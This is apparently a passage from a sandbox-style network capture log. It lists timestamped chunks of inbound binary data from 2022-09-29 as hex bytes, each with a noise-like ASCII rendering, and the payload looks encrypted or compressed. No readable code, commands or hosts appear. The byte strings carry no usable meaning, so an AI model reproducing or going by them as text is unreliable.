                                                                                                                                                    2022-09-29 12:59:27 UTC37714INData Raw: 55 1f c8 75 13 55 de d1 61 5a 3a e8 c9 67 1a ed 0a f7 af 9c 3f d6 e4 cb 21 9e d8 7f 01 05 cc 99 db b7 1a 92 51 62 50 28 0c a8 97 a3 f9 5e 5f 6d 4a 96 5b 7d 55 13 24 be 37 07 1f af 36 c9 ea 87 bd 46 94 f1 dd 28 19 5f 22 74 e8 bb be 13 52 99 f8 5b 21 8f 08 a6 9c 99 34 a3 b3 fa d6 d4 63 70 7e aa d2 76 00 e3 cd 32 82 e8 23 24 e9 87 7b 71 79 48 82 d1 fd b6 be 7a 22 38 18 02 bb cf e1 7e 87 e1 dd 55 dd dc 22 e1 cb f7 d5 cd 1a eb 1e f1 61 cb d4 98 c5 0a 81 ec e0 df c6 37 af 71 dc 1c ef c8 8c 12 48 18 39 2c ba 7b 3f 3b d0 60 11 ec f0 96 f6 46 eb f7 a9 6d 8d 42 2f 94 8e e8 dd 76 4b 16 8f c2 0a 9d bc f5 b1 65 86 78 f3 21 25 cb 74 68 b1 f8 5e 73 e2 67 81 c7 f1 09 bb 1c b2 cb ba ea c7 49 52 a8 ad 2f 60 a2 4c e7 5d 44 bd d0 a1 e0 1a 0e b9 dd 94 68 1c 60 72 b9 1f 48 ad
                                                                                                                                                    Data Ascii: UuUaZ:g?!QbP(^_mJ[}U$76F(_"tR[!4cp~v2#${qyHz"8~U"a7qH9,{?;`FmB/vKex!%th^sgIR/`L]Dh`rH
                                                                                                                                                    2022-09-29 12:59:27 UTC37730INData Raw: 3c 9b b1 03 b3 c3 22 36 5a ea a5 85 59 fd c7 60 0a 19 97 d1 5b 66 72 8f 83 ac 74 d1 ea a6 82 c9 3f b7 73 c0 7a a0 df c3 7e dc 9e 99 31 4c 8f 42 0b cc 7f c8 ea a7 6f c9 c2 41 bc 78 55 6f e4 5c 96 7d dc 32 ad cb 39 4c 4b 4f e6 bc 71 1b cf 7f 10 01 d7 19 95 4b f6 30 f1 0d 19 02 ad 0d 0b d9 8b f7 64 15 0b e5 0c af 3e ba 6b 81 45 93 06 8d bc 54 9a 44 94 bd f6 74 f1 a1 a1 06 ac b2 4f a2 b9 a5 9d bf a8 43 3f 83 45 71 bc f9 4b 5c f8 ef f7 38 2a e8 d9 c6 d9 17 54 52 73 a2 01 31 43 08 af e4 18 74 c0 14 7c 19 b6 15 e3 d9 8d dd 55 dd e9 36 f8 79 91 ea 4b 2e b9 f5 a8 ad 90 52 db 5d 3f 9d 9c 6b e7 cb f8 2b b6 42 f2 9a 3f 65 4e da 65 ea c2 6a b8 49 92 ff 31 01 b5 a9 b6 61 44 c3 61 62 9b 1b 9c 7f ad 00 8d da 7b 76 c5 0f fb 12 f8 dc f2 91 b8 57 d0 bf 93 52 60 4e 7e a1 2a
                                                                                                                                                    Data Ascii: <"6ZY`[frt?sz~1LBoAxUo\}29LKOqK0d>kETDtOC?EqK\8*TRs1Ct|U6yK.R]?k+B?eNejI1aDab{vWR`N~*
                                                                                                                                                    2022-09-29 12:59:27 UTC37746INData Raw: d2 0f b4 9e cd f2 c9 04 36 a8 47 57 ae fb 1b 4c 75 1d 4e 4d 06 e9 74 7c c1 cd 53 1b 88 05 bd b2 24 95 45 57 fb e5 e1 10 81 06 26 16 f2 dd 33 2a 48 f4 6c e9 16 37 88 b1 74 eb 43 a0 40 7c 80 05 c2 72 79 1d 6d 29 2d ee 27 12 21 56 ad fe 99 f2 d9 34 d9 f1 a1 ea 1e ec f9 4e 38 98 54 65 14 ab 47 67 5f 5a 47 f5 26 52 5a 7a 17 2a 20 32 06 dd 6a 68 e2 86 6b 56 52 22 5d 25 0a 4e 4d 19 dc 8d 18 e1 a4 98 d6 1f 6f 8b 74 88 46 56 6f ff ad 6f dd 10 8f a4 aa 6d 90 7a da 5f 7a 40 1f f8 16 d7 04 7c bc 35 9c 05 6e 08 5c 1e 47 cb 85 25 f4 e6 1f 81 1f 57 cc a9 42 2b 13 43 5e 52 a1 29 fb c1 89 08 62 77 99 dc eb e8 e5 52 a2 c5 6d a9 28 11 aa 47 ca 6e cf 49 c0 ff 1c 03 6f d0 09 f1 52 3f 27 7f 2d 6d e3 68 b0 e0 5f 6d f4 4a ca 79 74 3f ae 45 d3 1d f8 60 93 1c e2 ac 99 c7 65 54 f2
                                                                                                                                                    Data Ascii: 6GWLuNMt|S$EW&3*Hl7tC@|rym)-'!V4N8TeGg_ZG&RZz* 2jhkVR"]%NMotFVoomz_z@|5n\G%WB+C^R)bwRm(GnIoR?'-mh_mJyt?E`eT
                                                                                                                                                    2022-09-29 12:59:27 UTC37762INData Raw: a1 b5 f9 1c 3d a7 82 ef cb 10 f4 db 9e f5 4d 39 cf bf 99 a9 88 57 de 25 66 f1 af 49 fd b2 53 c3 d9 ab 3b a7 cb 3a 79 59 4c 3f 0f c5 86 44 01 a0 ca 1e 05 c5 70 ae ad 07 96 0d d9 69 ad 5f fe 5a 45 76 2e 87 84 24 8c 0e 56 d1 13 27 7f 65 3b e7 a7 b5 50 cc c7 c5 ec 1d bb a4 32 86 5e 39 91 01 3a f4 74 a2 47 2a 30 eb 43 79 0c 13 e1 c3 01 dd 02 75 d3 04 96 a5 90 47 9f 85 f7 86 cf 93 65 0b e0 d6 e3 d8 7b 40 fc 74 b7 11 e8 70 35 81 ef ed c3 5e 63 ab 88 fd c9 78 45 ca f4 80 2c 35 12 73 c6 8a de fc d3 8b 7b ad c8 2f 68 ef 26 74 78 25 5b 3b 1f ea f9 fb 77 e0 0b 3a 73 a9 71 dd 43 7a 0d 5c 05 20 01 6c 6e 05 c0 4d e1 0c 41 95 14 8e b9 a7 aa 9d e3 5a f8 4d 0a ae 45 0a a0 4a 2a 42 fa e0 dc c8 20 fe 6f 27 de 3e 30 68 67 ca 50 fb a3 5c b0 2b 48 12 d2 99 5d 1a c3 e7 bf 10 b9
                                                                                                                                                    Data Ascii: =M9W%fIS;:yYL?Dpi_ZEv.$V'e;P2^9:tG*0CyuGe{@tp5^cxE,5s{/h&tx%[;w:sqCz\ lnMAZMEJ*B o'>0hgP\+H]
                                                                                                                                                    2022-09-29 12:59:27 UTC37778INData Raw: 18 e3 81 07 44 de b7 fb 94 71 51 3b 7c 74 0b 0d 46 e0 7d b3 29 dc 11 be 7c cc ed 62 5b 1c 89 4b 22 68 ff 76 53 9b 4b 7a 5d 36 1a 12 39 6c b1 70 d8 55 88 fa 4d 71 76 4d d9 f3 08 ea bd a2 41 92 9f 8a 99 66 90 d6 1f fb 48 b9 21 10 24 dd 0d 35 3c 5a 8c 7d 21 d6 6e 2b 7b dd d9 11 df 6d 07 40 ba 4c a9 d9 85 0f ce be f0 10 69 4d 4d 48 8d 46 6a 5a 59 d1 e5 e8 2d 03 de e3 dc c9 11 f7 26 bb 55 ba 08 e2 a9 15 b2 6e 6d a9 fb 39 40 ef 71 6c f1 29 ff c8 a9 1a 24 90 e4 b1 35 52 ab 88 74 63 5b 42 bf 89 14 cb e5 35 a6 ac 4c 1b cb 39 66 72 6d 03 28 f4 aa ef d6 42 df 18 81 06 e0 d1 64 4c c0 a8 d3 a3 36 37 a4 d5 9b 4f a0 52 6a 93 6b 16 b7 28 db 69 d8 6c 02 d7 fc ab d8 61 58 ad 76 fc 24 81 a1 7d 75 b5 79 99 d5 33 fd 24 c7 f1 21 13 b3 15 19 3c 30 ed c3 bf 28 0c 4b ab 34 fd 80
                                                                                                                                                    Data Ascii: DqQ;|tF})|b[K"hvSKz]69lpUMqvMAfH!$5<Z}!n+{m@LiMMHFjZY-&Unm9@ql)$5Rtc[B5L9frm(BdL67ORjk(ilaXv$}uy3$!<0(K4
                                                                                                                                                    2022-09-29 12:59:27 UTC37794INData Raw: 7d 9c 74 13 0c 3d 63 9d 8e a4 90 1c d9 9c 7f 9a af c2 84 0c 5b 37 0c 44 14 9a 2f 07 09 db fc ea 0b e9 34 ce 68 e1 7c 37 ee b7 57 9b 86 45 3b 40 8c 51 b2 8a 4d ad 6f b6 61 53 89 2f dd db 75 7e ae ff d9 1a ff 5c 7f 55 e8 c5 55 68 b8 6e 50 95 30 87 f5 cb 2b 3d 55 20 d6 57 35 92 75 b1 ca 35 99 87 4c d4 84 5c e8 74 c1 23 70 b8 79 b5 31 fe 95 35 60 f5 26 0a 42 16 41 d2 8a 0f dc 7c 7d 5a 39 36 2a 42 78 0b 01 52 a6 62 67 d6 e0 cf 97 ed 3e e9 9d d2 30 c8 26 2f 91 9a 5d 00 fb 65 6a 11 a2 04 78 97 be 55 b0 cf 53 b7 2e 60 3a 04 21 3d 23 cd 12 67 4e d1 5a de 34 35 0a 4e d7 21 67 47 2c 44 ee 36 36 1a 08 3f 07 6c 96 6b ea 42 92 04 5b 6a f5 8b 5d 3f e4 ed db 76 c7 41 d4 da 01 c5 81 60 8a b1 e3 b4 9c 52 7c 6a d8 b3 4d ab f8 44 13 9f ca 56 18 06 9e de 60 b3 a6 2b d9 08 9a
                                                                                                                                                    Data Ascii: }t=c[7D/4h|7WE;@QMoaS/u~\UUhnP0+=U W5u5L\t#py15`&BA|}Z96*BxRbg>0&/]ejxUS.`:!=#gNZ45N!gG,D66?lkB[j]?vA`R|jMDV`+
                                                                                                                                                    2022-09-29 12:59:27 UTC37810INData Raw: 2c 49 ea d9 b6 f4 9c 7b f9 a8 d8 3f b1 70 3b a1 c1 dd 1b cf 93 b2 1d 28 7d eb ef 0f 0d 8e f4 da 27 62 b9 39 01 52 6c 81 85 c8 c7 83 eb 62 3e 4b f2 76 36 c2 4b 8c 36 8a 00 76 05 e7 60 09 3a 71 41 32 05 6a 69 65 57 18 cb 4f 84 3f 79 83 33 8f e1 fc 37 19 79 b0 45 5f 8e be 45 09 b7 29 19 76 a4 aa ef c8 32 f5 5a 7c 46 4b 3c 2e 51 2c 9c 1c a2 34 13 62 4f 92 e3 72 88 26 09 27 75 6c e2 43 bc 7e 50 73 d4 cb d8 a4 0f 20 41 a5 9a cd d8 33 01 33 84 a7 ba ed 23 7e 5a 86 b9 0c ac b8 a0 8e f2 71 16 fd 2e db f5 a0 89 67 6b 7f e5 f0 b0 23 ba 24 f8 d4 0d 5b 20 30 ba 6b 9c 3e bb 0c a5 64 0d 30 ed 30 a0 fd c0 9d 2b 94 ce 4e 9d 70 11 7b 9f a6 43 71 82 57 dd de 96 0d 52 07 78 3a 50 5b b0 08 ad 04 3c 04 6b 68 ed 9a 3c d4 b2 bb 94 77 53 d7 2a c7 29 49 0e 78 b4 5b c3 9e d3 b0 f6
                                                                                                                                                    Data Ascii: ,I{?p;(}'b9Rlb>Kv6K6v`:qA2jieWO?y37yE_E)v2Z|FK<.Q,4bOr&'ulC~Ps A33#~Zq.gk#$[ 0k>d00+Np{CqWRx:P[<kh<wS*)Ix[
                                                                                                                                                    2022-09-29 12:59:27 UTC37826INData Raw: 0c b2 4f 71 8c 6a 78 61 f7 18 01 a0 53 7b 27 22 9a 11 be 53 43 61 cf 59 c6 05 c6 1a ec 76 4c 56 67 81 da 6b 8a 0d 60 1a 95 9c 1c 49 1c 8f c1 8a 8f 28 a6 0b d6 c7 5c 80 70 aa 38 b9 c9 36 9a 8a 7d 3c 76 30 7f 86 bb f3 8a 6e d4 85 9e 6f 3a 76 58 bc ae 1c cc 01 d7 16 c8 74 c6 45 15 26 d7 0e 3e d4 34 cf b1 2f cd f5 5b 09 12 ad 5c 11 3a ad 08 9e 02 23 57 a1 54 27 d2 b0 d3 35 64 de e1 be 0e 78 d8 e9 4a 5e fc 45 5c 5e 24 f2 cd 91 8d 3e d5 a8 7a ef 63 52 95 6c 02 fa e4 cf 3d d2 a2 46 f9 9f e6 0b 7b c0 d0 b2 04 c5 58 fb c7 2f 79 8b b5 ff 60 07 40 56 f2 c4 34 1d 10 73 3b f6 18 98 15 d1 dc 70 3d 3f 1a b1 2b 42 98 ed 6b 39 59 95 e5 8a 47 d5 4a 7e d0 e0 da 1d 7d 0f e8 fa fe 23 0a 98 43 98 b0 08 ee f8 94 c1 d8 43 78 cc a8 09 31 4c 12 4f 18 ea 82 9b d0 90 e1 3a d6 94 ad
                                                                                                                                                    Data Ascii: OqjxaS{'"SCaYvLVgk`I(\p86}<v0no:vXtE&>4/[\:#WT'5dxJ^E\^$>zcRl=F{X/y`@V4s;p=?+Bk9YGJ~}#CCx1LO:
                                                                                                                                                    2022-09-29 12:59:27 UTC37842INData Raw: 15 66 d3 63 96 dd 69 e3 a5 e8 e0 d2 a1 7e b7 b9 a1 6b ad be f7 73 22 59 1b 1c f2 7d eb 4f f8 a0 7b b7 c0 02 29 56 3e 27 3f ba 77 00 d2 34 eb bc a3 b2 a8 2b 0e 36 7a 96 b7 00 cb 8b 58 a2 bb 8c 03 78 1f 62 1f e5 b0 34 88 e6 4e 8d cf 8f 20 a4 8f ab 60 06 68 53 05 fe 90 db a6 8b 4d 3d 26 d2 ab a1 48 d2 43 6c 23 c4 1d 78 ba 31 22 af 79 ac 16 76 7e b2 54 79 d2 0e c5 ab ff f7 95 2d 29 45 bf 91 09 a0 ac 3c 91 cd f8 a3 c1 eb 7c da 41 e4 80 cb 2f ef fc d9 88 40 54 f2 6c 48 e9 67 a0 2d ec 13 a0 3a 1e f1 7a a4 59 db fd e8 11 4e 9f ba 2f 2f a6 5b 97 57 ac b6 18 19 23 5c 04 e9 e5 3d 51 9c 02 04 19 ac 34 14 36 e3 29 95 34 c0 0c 37 c3 b3 ca 03 bd e3 c2 4e ae b3 76 1a 25 d4 a0 e5 f6 fc d3 5c af c2 88 f2 6f 2b b2 5c 93 07 86 58 b3 6b 50 96 09 23 6e 88 3e 99 7f f1 ba 17 0a
                                                                                                                                                    Data Ascii: fci~ks"Y}O{)V>'?w4+6zXxb4N `hSM=&HCl#x1"yv~Ty-)E<|A/@TlHg-:zYN//[W#\=Q46)47Nv%\o+\XkP#n>
                                                                                                                                                    2022-09-29 12:59:27 UTC37858INData Raw: 57 95 d9 90 b5 b1 71 10 7e cb 99 7c 5b c0 97 c0 56 37 9d dc 26 25 01 96 da 50 16 5a 69 d7 b6 a9 4f ff 94 a4 f7 cd 42 10 10 cd 52 d9 be c7 f0 4e f4 7b 6a be 62 89 23 00 b7 d7 95 c9 74 1c 8c 12 ee 08 66 43 88 4a 97 40 27 c3 18 9c 68 38 c5 95 33 c9 25 e6 3e fc 02 47 92 7e f5 6d 06 e7 68 f3 df e4 8a bc 26 81 12 53 3c b2 79 b5 f8 4f 8d 3f 40 b2 c2 33 24 b6 ad ec 03 e5 cd b6 f3 08 01 7e dc bc e4 e2 7d 01 95 c2 a4 b8 f4 2d 7e ae a5 4b 17 e3 f0 2e 41 d3 24 85 0a 89 02 4c c8 9e 35 61 a6 6e 2b 3b 04 87 4b 77 b2 2f 1d 90 8d e1 47 3e c2 dd 0d e9 d0 6b 03 e5 98 fb 1b 0d 34 f7 63 80 62 d1 81 9d b3 66 23 7c 32 2d b6 2c 36 80 46 41 8f 5b 2e 0e 6c 29 d3 5e 21 37 f1 94 ca 31 6a e2 a5 e6 68 1e cc d6 02 2f 88 4f e4 a3 7d 74 5a a0 1b 90 f2 95 fd 29 14 9f c5 52 0f 94 cf 7f fe
                                                                                                                                                    Data Ascii: Wq~|[V7&%PZiOBRN{jb#tfCJ@'h83%>G~mh&S<yO?@3$~}-~K.A$L5an+;Kw/G>k4cbf#|2-,6FA[.l)^!71jh/O}tZ)R
                                                                                                                                                    2022-09-29 12:59:27 UTC37874INData Raw: 35 0b 01 fa f6 6a 13 44 f6 2b 30 f6 92 be f6 50 a7 4e bf 59 06 31 28 0b 4e 9c f0 0e 37 d5 62 a7 2f 82 45 b8 0a ce 1b 82 f8 1a ca c4 90 7c 98 1f 86 bb 7b 48 cd b2 3e 9d a4 42 49 6c cb 1b f9 97 36 1f 98 1f 53 39 9b 8a b1 ac 12 e3 c6 58 66 38 ee b3 79 3b 41 4c 99 48 c5 c6 68 3b 7f 71 3a 92 28 e8 b5 95 dd 66 e4 da d1 4f 45 fc 62 8e f9 51 de 7d 22 09 a5 83 97 e8 3b 39 b5 cd 69 5d b3 4b 8a 11 58 08 50 60 a8 7e 5f 1c f9 8d 21 7f 04 23 92 59 5a eb 54 2f d0 a4 b2 e9 89 6b 52 cb f4 e3 ab ff 28 ea 87 55 02 fa 24 eb f6 00 d4 7b 49 8e b7 39 8d f0 08 fc b0 1b 5e 5c f4 c9 23 3c 87 0d 5e 32 4d f4 8d 0d bf 9d 39 25 56 f9 82 eb 52 28 68 59 f5 bc d3 f2 49 3f 95 2d 40 d2 91 04 47 9e 65 31 77 8a 2a 7f 18 0c 66 59 14 f9 e3 ec f3 17 0e 99 0b 84 08 7a 30 61 b1 85 df dc 95 47 7a
                                                                                                                                                    Data Ascii: 5jD+0PNY1(N7b/E|{H>BIl6S9Xf8y;ALHh;q:(fOEbQ}";9i]KXP`~_!#YZT/kR(U${I9^\#<^2M9%VR(hYI?-@Ge1w*fYz0aGz
                                                                                                                                                    2022-09-29 12:59:27 UTC37890INData Raw: 34 cf 71 ee 7d e0 64 40 b5 6c 7b f0 b1 f6 f6 04 4f 8d 30 29 dd 4a 5f b7 b9 14 f5 d2 7f 0a c3 7a f3 3e 16 b1 88 37 b6 06 12 5b d0 b7 88 49 a4 85 4d ae 1b 03 74 ae 36 1d ad 7b e8 fe 20 c1 d8 af 57 3e 11 0a 1a 47 65 61 57 92 eb 8b a8 3c 8c a2 20 e8 9f 99 8e 09 54 f8 5f 3c 72 56 38 a6 7c b8 eb 1e f1 52 58 7e 95 3e 79 a5 df 92 28 20 be c0 24 40 58 aa b9 3d 65 90 53 67 da d0 26 73 71 12 53 13 c9 ba e1 f0 ff 73 7f d1 62 3d ad 01 62 65 08 9b e7 e5 14 9e a7 f3 4a 69 8e a2 4d ce d6 4f 02 f5 07 3d 76 43 74 fb e4 e5 c7 b9 95 67 91 10 17 5b 75 33 e6 16 89 53 07 4c 71 1a d4 53 52 f3 05 e9 c4 2b 37 a6 3c a3 bb 37 5d d1 e1 cb 1d aa d3 0a 41 8e e3 ac bd 04 c0 fb 8f 06 08 2e 6d eb 47 5a b3 94 ee 2d a9 a3 1a 10 84 43 8a 9d da fe 7d 87 da 1e d1 ae 78 4a f8 f0 d0 bd 9d e0 8c
                                                                                                                                                    Data Ascii: 4q}d@l{O0)J_z>7[IMt6{ W>GeaW< T_<rV8|RX~>y( $@X=eSg&sqSsb=beJiMO=vCtg[u3SLqSR+7<7]A.mGZ-C}xJ
                                                                                                                                                    2022-09-29 12:59:27 UTC37906INData Raw: 81 45 39 4a 43 15 10 c5 8b 0a 77 82 5e f9 14 25 45 2c 6a b3 3d af 11 1e 42 39 ee 81 56 47 85 a7 3c 65 1e b7 53 96 66 17 41 6d 1f 45 be 0b 28 e6 47 33 31 43 e7 cc df 21 56 7a d3 54 33 af 0e 15 f3 53 a7 2c 9d 60 29 ab 05 ea 83 47 b4 6f 7d f2 53 3c d5 fa 6b a0 10 3b fa 81 0f ac be f8 d8 1b 98 29 3e 13 c8 f9 d9 12 64 cf ad 43 15 20 93 e4 f6 2b e9 68 c5 d2 5c 73 48 49 97 77 45 cd 06 8f fe b7 6b 7c 1b 8f c0 a0 75 ba ba 3c 78 5e c0 14 b8 99 dd 99 a8 f5 10 27 23 e9 aa dc c2 03 50 a2 83 53 d0 37 56 c7 1e 8f a3 29 79 22 db 1c fe 60 6c 8c 7d fa 24 ff 03 7f 49 1c 2a 77 67 e4 f9 4c 5b 35 26 0b b9 d6 5a b3 07 6b 81 41 ad 00 21 fe cd ae 4c d1 78 56 bd 49 e2 96 64 18 65 91 67 7e 1d 38 b8 77 7c 02 33 15 ba 3f ac fb 1c 2e ad 22 d8 47 e7 0b e4 91 88 93 4c e0 50 1f 89 dd 5f
                                                                                                                                                    Data Ascii: E9JCw^%E,j=B9VG<eSfAmE(G31C!VzT3S,`)Go}S<k;)>dC +h\sHIwEk|u<x^'#PS7V)y"`l}$I*wgL[5&ZkA!LxVIdeg~8w|3?."GLP_
                                                                                                                                                    2022-09-29 12:59:27 UTC37922INData Raw: f3 ff 93 56 27 d8 46 64 d4 9e 7a d7 47 95 f2 b4 3d cc 53 2e d4 05 02 b8 7e 4a c1 6f 48 19 a4 db 0b d6 ff b5 87 b3 1a 28 57 91 d2 73 b7 a6 13 0e 0f 6e 88 fb 45 f7 c4 ed 5d 9e 47 9d 6b 18 23 66 e1 d5 32 de c9 4c 2a 45 56 be 9b 84 db ee 29 8c 2f 14 b9 b5 2e 3f 9e dc 0f 51 80 c9 64 19 94 17 8b b8 c6 48 13 ce 27 b8 fb 6f c9 a0 ca 23 8d 75 bf 66 36 95 fc aa fc a1 cc bb 7f eb 5e 1d a0 51 e4 ca ed 39 0a fb 48 2e 1e 28 25 8f 9a a2 f9 6e c9 13 47 b3 87 32 8e 09 99 02 d0 b7 65 52 12 35 9b 1f 84 ed 0c 7e b4 9e 96 f8 15 db 55 77 28 48 42 7b 62 95 52 d0 3e fe a8 d3 e7 4b 3e 40 5e 36 a7 59 4b 2f 63 0e 54 3b 9e 85 3a 6a 57 48 af 68 4b 25 90 70 98 d5 3d 58 51 ef 67 0f 77 cc 00 9b 0e 6f c1 cc f3 7e a2 7a d6 ac 50 c5 48 c6 cc d3 07 9a f1 9e c6 d0 f5 ae 3a de e3 e9 ec f0 16
                                                                                                                                                    Data Ascii: V'FdzG=S.~JoH(WsnE]Gk#f2L*EV)/.?QdH'o#uf6^Q9H.(%nG2eR5~Uw(HB{bR>K>@^6YK/cT;:jWHhK%p=XQgwo~zPH:
                                                                                                                                                    2022-09-29 12:59:27 UTC37938INData Raw: 9f d0 9e 2d 26 17 ef 1a 56 5e 53 b6 35 74 dc a4 80 9c ef 7a f5 64 68 43 e3 c8 fb c9 52 12 eb f1 dc 38 f2 fd 8b ef a8 27 7c d4 bd 2a c3 05 1e 22 6f 82 94 72 e8 74 b9 f0 02 53 7c ad 02 e3 dd 4c 6b 01 44 4e 06 a7 5c a7 11 ec 8e 7a 84 0f 88 fb 9e c9 1a c1 15 29 e8 1c a8 b1 82 a5 17 9b f4 39 fc cd 58 55 bd bb 71 e2 17 13 72 67 11 55 2b 9d fc 1b ee c9 ae 1d fa 32 39 66 d6 62 5a bf 6e 34 b6 a0 a7 f6 70 76 a4 5b cf 02 f7 90 99 ca e8 02 68 66 80 0b 3c 27 12 6e 35 63 90 d0 f8 cf 18 17 81 e1 67 a0 99 ae 15 e5 56 74 d3 36 26 18 cc 3a b9 ba 48 2a e9 62 70 e9 24 48 5a df 9c ac e7 df 6c fd 33 d0 85 9e d6 10 2a 43 07 b9 de 99 5b 62 ae 34 0b 57 e5 fa 24 ca 29 95 2c f7 2c cd 3f ef 7a 2e e8 0f 08 d9 50 48 2c 4b ae c8 95 9b 09 f9 16 dd db 98 81 66 91 82 8f 5e 36 31 c4 12 e9
                                                                                                                                                    Data Ascii: -&V^S5tzdhCR8'|*"ortS|LkDN\z)9XUqrgU+29fbZn4pv[hf<'n5cgVt6&:H*bp$HZl3*C[b4W$),,?z.PH,Kf^61
                                                                                                                                                    2022-09-29 12:59:27 UTC37954INData Raw: 2c 19 a1 ba b3 43 7e 73 62 11 08 6d fa d8 e0 48 a5 c9 83 dd 0d b5 50 cc d1 9a fe ad b5 6c df 5a 1d fe 92 cc a7 59 aa 55 9c 05 c1 a6 8f f5 0a 76 f1 d5 19 b2 8a 90 2c f7 5b 62 ca d5 b9 6e ec b9 af 40 24 b3 cb 00 7a f5 69 dc 27 98 f7 b9 02 0d 40 57 40 6c 2a 65 65 ff 09 e2 5b 80 92 70 4e ae 36 19 b2 33 60 8a 7f a1 02 81 30 3f 9a c4 5b 29 2f a2 d3 ba dd eb c7 70 38 41 7d 1b af aa 8e c0 ae c4 4e 2f 6e 50 79 6d 6d 73 c3 74 07 7a 33 1e d9 c2 c5 d0 bc 54 66 a4 e5 39 fd 25 9f 77 c0 04 1e a8 c6 e9 4c 28 b7 50 4e f9 32 d9 4f 34 1a e7 82 0e dc c4 50 8c 32 dc c3 eb 4a 52 70 5b 3a 4b cc 7f aa a4 97 8f 30 10 25 ab 92 63 bd fa 8e 4a 1f 55 7d 6b 9c df bf 57 4a 39 a4 b9 8f 7f fd 11 50 2a 91 f2 c5 ea bf 21 27 01 20 80 cc 6b ed e2 99 32 09 1a a7 7a e8 39 7a 96 ab 3d e5 6d bf
                                                                                                                                                    Data Ascii: ,C~sbmHPlZYUv,[bn@$zi'@W@l*ee[pN63`0?[)/p8A}N/nPymmstz3Tf9%wL(PN2O4P2JRp[:K0%cJU}kWJ9P*!' k2z9z=m
                                                                                                                                                    2022-09-29 12:59:27 UTC37970INData Raw: fa 24 fc 1b 77 07 07 a8 6c bf d7 55 7d 06 62 ef 4f 61 64 0a e2 3e 05 15 ac 7c 20 3b 5c bc 5e aa 11 b1 3a 08 ab 41 17 51 90 6c de b1 48 97 c8 42 22 30 4c 8a 3e 0f 28 ae 49 f0 49 21 da 1e 26 6b 4c 66 22 c7 82 7c c2 c3 01 f6 ba 29 94 54 a7 67 f3 93 25 a0 fc ae 5a bb f7 32 4a 61 59 dd a6 36 77 db 81 49 54 36 8c 77 f3 43 33 3b 9f af 2e 42 5e d3 5e 94 71 05 66 5c 63 f4 7a 4f 8f 8b 88 f4 99 5a 47 c5 2e 0a 44 b0 37 23 0d 63 09 c6 a8 f4 65 58 cd a6 0a 2c b1 eb 63 00 4c a5 b0 26 18 1d ee 65 d1 da 83 8c d6 bd 72 e1 aa 3a f0 da 80 97 99 2a 80 18 76 bf a8 7f 72 72 8f ad 51 79 c8 0d e3 d0 16 0b 16 04 70 01 5b 05 35 52 cb e2 2a 75 3a 6d 8d 40 17 3e 61 55 00 0a ed 46 08 d7 84 01 94 3a 8a ed ed d7 33 98 61 16 eb 04 73 52 75 43 bf ca 8b dd 1c 6f 75 21 bd 6a 54 22 67 cb 38
                                                                                                                                                    Data Ascii: $wlU}bOad>| ;\^:AQlHB"0L>(II!&kLf"|)Tg%Z2JaY6wIT6wC3;.B^^qf\czOZG.D7#ceX,cL&er:*vrrQyp[5R*u:m@>aUF:3asRuCou!jT"g8
                                                                                                                                                    2022-09-29 12:59:27 UTC37986INData Raw: 1b e3 64 79 fc 4f 3a f1 88 82 48 d0 79 5c 16 5b 7c 2f 21 6e a1 68 40 45 dd 24 25 05 b6 8d 21 d8 4d 48 46 11 c0 9f c6 ca 34 b0 fc f4 f3 0b 5c fb 8b e6 62 b0 69 4b a7 da 8d cc 32 ea f2 31 4e fe 41 a7 45 62 da ee 2b d2 ee c9 9b 9e d9 08 13 8c 69 bd 63 52 d0 19 e7 5d e8 ba d6 5d f8 53 b8 5a d2 86 2f 61 ec 01 64 d1 49 a5 6d 36 81 d9 4d be da f7 1d 26 02 64 71 d1 7d e9 23 8e 59 6b ea 02 16 61 a9 8e 06 8b 75 13 27 7e 7b 88 3f 2b 25 f0 59 91 6c e4 80 0e 25 66 10 8a d8 f8 d6 5c 3d 4d c3 4a ea 07 e7 b6 a2 88 73 53 a2 a6 94 75 07 03 06 f4 20 33 7c 19 22 c3 e4 20 77 6e 9e e7 da 9d fb 5e 23 f6 8b 77 c1 d0 63 e1 e6 cb f8 f1 68 b1 72 4f 60 e2 db c3 f3 7a f5 93 55 20 b4 aa 57 db 51 2e 42 53 98 23 86 4f dc 1b 80 af 5f 55 48 02 54 19 6f 14 81 48 1a ea e0 bf 4a c0 20 ae 47
                                                                                                                                                    Data Ascii: dyO:Hy\[|/!nh@E$%!MHF4\biK21NAEb+icR]]SZ/adIm6M&dq}#Ykau'~{?+%Yl%f\=MJsSu 3|" wn^#wchrO`zU WQ.BS#O_UHToHJ G
                                                                                                                                                    2022-09-29 12:59:27 UTC38002INData Raw: 48 42 15 27 55 71 8f 71 37 5e fc ba 22 f0 21 54 c9 5a bb ec 9d 97 bd a2 3a 00 d6 aa d2 64 e8 7c db 6b ff ad 9b 80 3c 69 9c d6 df 12 93 7f fb 6f 0e 99 0c d8 93 5b 74 b5 16 d1 72 9b 62 a0 51 41 df b3 f1 e2 11 3c a3 29 86 ae 32 5a 5e 82 c7 89 ce dd ea c6 ca 90 a3 33 06 dc ce dd 94 cc fc bd 9b f0 1d f0 04 17 b9 60 51 55 7d 0d f8 17 6d 74 e2 fa 5a 2b 78 18 ec 2f a5 12 e5 94 f4 53 c2 ba 79 6f 1b f7 db ea c2 c1 07 1f 9c ff 06 e8 20 d2 26 4e f8 aa e7 8a f6 c3 c4 e5 2f 7c 68 68 c0 39 19 11 c5 9d f8 4d 91 fa 9d 44 9c 69 84 50 2e 0d 18 02 f9 ae 83 a3 8c 5e 1a 9f bb a9 16 a7 d6 80 92 3e fa 74 23 7d d7 0a 93 fc 48 d4 35 fc f2 ed ff 39 6c 7b 08 d5 b1 f0 fb 8b ef ef e3 fd cc ac 01 c9 35 00 b9 1d f7 14 74 d6 da 79 8e c2 4d 81 10 ac 6f 87 a1 45 28 ae 06 84 fa 88 36 15 d5
                                                                                                                                                    Data Ascii: HB'Uqq7^"!TZ:d|k<io[trbQA<)2Z^3`QU}mtZ+x/Syo &N/|hh9MDiP.^>t#}H59l{5tyMoE(6
